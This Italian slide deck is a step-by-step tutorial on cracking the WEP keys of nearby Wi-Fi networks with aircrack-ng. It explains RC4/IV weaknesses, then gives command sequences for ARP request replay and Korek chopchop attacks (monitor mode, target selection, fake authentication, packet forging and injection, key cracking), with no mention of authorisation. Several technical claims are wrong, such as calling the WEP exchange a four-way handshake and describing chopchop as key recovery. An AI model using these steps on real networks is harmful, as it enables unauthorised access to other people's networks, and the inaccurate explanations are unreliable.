1. Wireless:
Questa insostenibile leggerezza
dell'essere...
WEP
http://www.wardriving.it - http://www.backtrack.it By Aspy
2. Il wireless
Come funziona l'autenticazione fra access point e client
Al momento della connessione si attiva il four-way-handshake
1)Il client fa una richiesta di autenticazione all'AP (client
connesso)
2)L'AP risponde inviando un pacchetto da 128 byte in chiaro
3)Il client risponde reinviando tale pacchetto crittato con la chiave
comune (shared Key)
4)L'AP fa un check per verificare che il pacchetto sia stato crittato
correttamente e garantisce al client la connessione in caso
affermativo (client autenticato)
Quindi si possono sniffare pacchetti crittati ed i corrispondenti
pacchetti in chiaro :-)
3. Il wireless
Come funziona l'autenticazione fra access point e client
●La chiave comune (40 o 104bit) viene concatenata al IV
(initialing vector) per creare la chiave rc4 che viene usata per
crittare i pacchetti tramite XOR
● chiave di crittazione=rc4(chiave+IV)
●L'IV viene inviato in chiaro.
●l'IV è lungo 24 bit, pertanto: 24 bit == 2^24 chiavi
●Con abbastanza traffico, si fa in fretta ad utilizzare tutte le
possibili combinazioni di IV, quindi gli stessi IV vengono riutilizzati
più volte.
Dato che i pacchetti vengono crittati con XOR, e conoscendo IV,
avendo abbastanza pacchetti è possibile risalire alla chiave.
Nota: per le caratteristiche dei pacchetti ARP, si conoscono a priori
i primi 16 byte del pacchetto, facilitando il crack della chiave
4. La trasmissione wireless
Possibili attacchi al WEP
1) Deautenticazione: (solo WPA) scollega un client dall'AP a cui
è associato per indurlo a richiedere l'autenticazione ottenendo
pacchetti di 4-way-handshake.
2) Fake autentication: utile per collegarsi all'AP anche se filtra i
MAC address
3) Interactive packet replay: replica i pacchetti letti stimolando
l'AP a fare altrettanto, raddoppiando di fatto il traffico generato
4) Arp request reinjection: si individua una richiesta ARP che
viene reinviata ripetutamente in modo da generare continue
risposte e quindi traffico utile
5) Korek chopchop: Basandosi su metodi statistici di
criptoanalisi si ricava la chiave WEP sfruttando le debolezze del
protocollo RC4.
5. Comandi per gestire la scheda wireless
Ifconfig -a : Lista tutte le interfacce
Ifconfig wlan0 up/down : accende /spegne interfaccia
Iwconfig : mostra schede wireless
Iwconfig wlan0 essid pippo : associa la scheda all'AP con sid “pippo”
Iwconfig wlan0 essid pippo key aabbccddeeff : associa la scheda all'AP
con sid “pippo” e chiave wep “aabbccddeeff”
Iwconfig wlan0 mode monitor : pone la scheda in modalità monitor
Iwconfig wlan0 mode managed : pone la scheda in modalità standard
Iwlist wlan0 scan : effettua scansione per individuare reti wi.fi
7. AIRCRACK-NG
●Aircrack-ng – tool per il crack
●Airmon-ng – configura la scheda in mode monitor
●Airodump-ng – colleziona in pacchetti
●Aireplay-ng – inietta pacchetti arp
Attenzione: per verificare se la proprio scheda di
rete permette di fare injection, usare il seguente
comando
#aireplay-ng -9 ath0
La risposta deve contenere:
Device injection capabel was found
8. AIRCRACK-NG
Vediamo un attacco veloce da eseguire contro una
rete con client attivi, denominato ARP REQUEST
REPLAY. Viene catturato un pacchetto con una
richiesta ARP generata da un client e viene
replicato “iniettandolo” nella rete al fine di stimolare
l'AP a produrre un elevato numero di pacchetti
contenenti IV.
9. AIRCRACK-NG – fase 1 configurazione
Configurare velocità (da settare appropriatamente)
#iwconfig <interfaccia> rate 1M
Mettere la scheda in modalità monitor
#Airmon-ng start wlan0
Questo crea una scheda virtuale “mon0” che
useremo per il dump dei pacchetti
Per ripristinare modalità managed
#Airmon-ng stop wlan0
#Airmon-ng stop mon0
10. AIRCRACK-NG – fase 2 ricerca bersaglio
#Airodump-ng mon0
Vengono mostrate le reti trovate, la cifratura, il sid
(ESSID), il segnale, il mac (BSSID), il canale
Segnatevi i dati della rete trovata (ESSID, BSSID,
canale)
Segnatevi anche il mac della vostra scheda wi.fi
11. AIRCRACK-NG – fase 3 acquisizione dati
Iniziate l'acquisizione
#Airodump-ng -c [canale] -b [BSSID] -w [file dump]
mon0
Dovete indicare il canale ed il mac dell'AP
-w indica il nome del file dove memorizzare i pacchetti
catturati
12. AIRCRACK-NG – fase 4 fake authentication
Si deve stimolare l'emissione di pacchetti ARP. Per fare
questo prima si effettua una associazione all'AP
Associatevi all'AP
#Aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [MAC] mon0
Dove e = SID
Dove a = mac AP
Dove h = mac scheda wi.fi
13. AIRCRACK-NG – fase 5 ARP request injection
Poi si stimola l'emissione di ARP packet da catturare
mediante injection. Nei pacchetti si trova l'IV, che sarà
utilizzato per il crack vero e proprio
Avvio della injection
#Aireplay-ng -3 -b [BSSID] -h [MAC] mon0
Dove b = mac AP
Dove h = mac scheda wi.fi
14. AIRCRACK-NG – fase 6 crack della WEP KEY
Dopo avere raccolto un numero sufficiente di pacchetti si
può lanciare il programma che tenta il crack della chiave
Avvio del programma di decrittazione
#Aircrack-ng file.cap
15. AIRCRACK-NG
Proviamo un attacco contro access point senza client
wireless attivi, denominato Korek chopchop.
In questo caso viene analizzato un pacchetto emesso
dall'AP per estrarre i dati necessari a creare un falso
pacchetto ARP request che viene iniettato nella rete per
ottenere pacchetti contenenti IV.
16. AIRCRACK-NG – le fasi 1, 2, 3, 4 sono le stessse del
precedente esempio
1) configurazione scheda
#Airmon-ng start wlan0
2) ricerca bersaglio
#Airodump-ng mon0
3) cattura dei pacchetti
#Airodump-ng -c [canale] -b [BSSID] -w [file dump] mon0
4) associazione all'AP
#Aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [MAC] mon0
17. AIRCRACK-NG – fase 5 ricerca pacchetto
Per completare l'attacco ci serve un pacchetto emesso
dall'AP. Questo viene catturato ed analizzato al fine di
forgiare un pacchetto ARP da iniettare.
#aireplay-ng -4 -b [BSSID] -h [MAC] mon0
Quando viene catturato un pacchetto adatto viene chiesta
conferma per il suo l'utilizzo. Quindi automaticamente
viene creato un file .xor necessario per creare il pacchetto
arp da iniettare.
18. AIRCRACK-NG – fase 6 creazione falso ARP
Chiediamo a packetforge di creare un pacchetto ARP a
partire dal file xor e salvarlo nel file pacchetto_arp.cap
#packetforge-ng -0 -a [BSSID] -h [MAC] -k
255.255.255.255 -l 255.255.255.255 -y [pacchetto.xor] -w
pacchetto_arp.cap
19. AIRCRACK-NG – fase 7 iniezione falso ARP
Quindi iniettiamo il pacchetto creato ed aspettiamo di
avere 30000-40000 ivs.
#aireplay-ng -2 -r pacchetto_arp.cap mon0
20. AIRCRACK-NG – fase 8 crack della WEP KEY
Dopo avere raccolto un numero sufficiente di pacchetti si
può lanciare il programma che tenta il crack della chiave
Avvio del programma di decrittazione
#Aircrack-ng file.cap